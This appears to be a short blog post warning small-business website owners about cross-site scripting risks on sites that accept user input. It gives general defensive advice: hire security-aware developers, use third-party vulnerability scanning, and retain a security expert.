If you have a web site that does not capture information and only displays information to people visiting it, you can breathe a small sigh of relieve that most likely your web site is pretty secure. However, if your web site captures information (as in ecommerce, forms, online database) you could have a back door for hackers to access your web site data and if your web site is connected to your network, to also gain access to your network.
ConnectITNews writes Jeremiah Grossman, WhiteHat founder and CTO noted that any site that takes user-supplied content usually has some kind of cross-site scripting vulnerability. He explained that cross-site scripting lets the bad guys leverage the trust of a public or well-known website to exploit users to do things like execute web worms or phishing super bait where a scammer might overlay a credit card stealing code over a real website rather than a fake one.
I’m not a security specialist and you’re not either.
There’s a few things you can do to better protect yourself:
1. When your web developer creates an application for you, ensure they have some background in security and can “program securely”.
2. Ask a third party to test your web site for vulnerabilities. Companies like ScanAlert provide services that continuously scan your web site and report to you on any problems you find.
3. As you do more and more business online you might want to consider hiring a full time security expert or at the very least have on on retainer who can work with you and knows how to properly implement tools and services to keep your web site secure.